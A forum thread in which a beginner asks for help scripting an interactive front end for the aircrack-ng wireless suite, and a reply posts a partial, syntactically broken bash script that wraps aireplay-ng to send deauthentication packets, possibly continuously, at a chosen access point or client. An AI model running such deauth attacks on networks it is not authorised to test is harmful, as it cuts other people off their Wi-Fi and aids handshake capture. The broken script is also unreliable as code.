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n00b Needs advice on shell scripts


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Hey all,

I'm new here and thought I'd introduce myself with a question.

I'm currently teaching myself to write shell scripts and, if I'm honest, I'm not doing to well.

I cant figure out how to call another program from with in my script.

What I am trying to achieve is an interactive script for using the aircrack-ng suite.

My stumbling block is where I want to call airmon-ng and extract the wireless devices it finds as variables and present them to the user in a numbered list:

1: ath0

2: wifi0

3: wlan0 etc....

I have tried

function airmon-ng








read response

if response=


function airmon-ng


but nothing happens.

Can anyone offer any advice on how I could achieve this?

I have a feeling i will need to do something like

./airmon-ng | nano file

and then parse the file with sed or awk to extract the device names and pass them to the script as options for the user.

(I hope there is an easier way.... sed and awk scare me..... i'm stoopid!)

If anyone can advise me, i'd be really grateful :)

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I wouldn't go about this in the way that you get the wireless devices from airmon-ng.

I would get the devices from ifconfig.

I don't think you'll be able to get away with not using awk, but I could be wrong, but using the applications that the terminal has built in will be easier to incorporate into the script and to modify their output to your liking.

You'll have to probably store each device to a variable and then display them. This will be quite the project and props to you if you can complete it. This will be a huge project if you incorporate all of the aircrack tools within the script I wouldn't go about this with a script if it was me, especially bash scripting, but I'm sure it's doable.

I have written some scripts for working with specific tools with aircrack-ng, but never the whole suite, so good luck to you and hopefully someone with more bash knowledge will leave some knowledge behind. =)

EDIT: Added my Aireplay Deauth Script. Note, this is used on a Sharp Zaurus(Linux PDA) which is not enjoyable to type out all the commands, but it may be of some use to someone.

# Author: HacDan
# Author Email: hacdan@gmail.com
# Note to audience: Yes I'm a C++ programer and I prefer everything
# in functions, I'm sorry for any inconvenience.

#Set Wireless Device, Normally wlan0


echo "#############################"
echo "# Aireplay-ng DeAuth Script #"
echo "#############################"

# accesspoint is the function that requests the Access Points BSSID
# Also this function asks the user if the BSSID is correct and 
# prints the currnet BSSID
accesspoint () { 
echo "Please enter the Access Point's BSSID" 
read apbssid
echo $apbssid "Correct?" "1=Yes 2=No"
read answer

if [ $answer = "1" ]
	return 0

if [ $answer = "2" ]

# client is the function that requests the Singe Client's BSSID
# Also, as with accesspoint() this function asks the user if 
# the BSSID is correct and prints the current BSSID
client () {
echo "Please enter the Client's BSSID"
read client
echo $client "Correct?" "1=Yes 2=No"
read answer2

if [ $answer2 = "1" ]
	return 0

if [ $answer2 = "2" ]

# main sets global options and also prompts the user for the type of deauth
main () {
echo "Is this a single or all client deauthentication?"
echo "1=Single 2=All Client"
read answer3

if [ $answer3 = "1" ]

if [ $answer3 = "2" ]
echo "How many deauth packets would you like to send?" 
echo "Enter 0 for a continuous stream of deauth packets."
read packets

if [ $answer3 = "1" ]

if [ $answer3 = "2" ]

#Actual Commands
noclient () {
aireplay-ng -0 $packets -a $apbssid $wifidevice
#echo "$packets $apbssid $wifidevice" ## For testing purposes only

withclient () {
aireplay-ng -0 $packets -a $apbssid -c $client $wifidevice
#echo "$packets $apbssid $client $wifidevice" ## For testing pupouses only
main #Starting script from the bottom!

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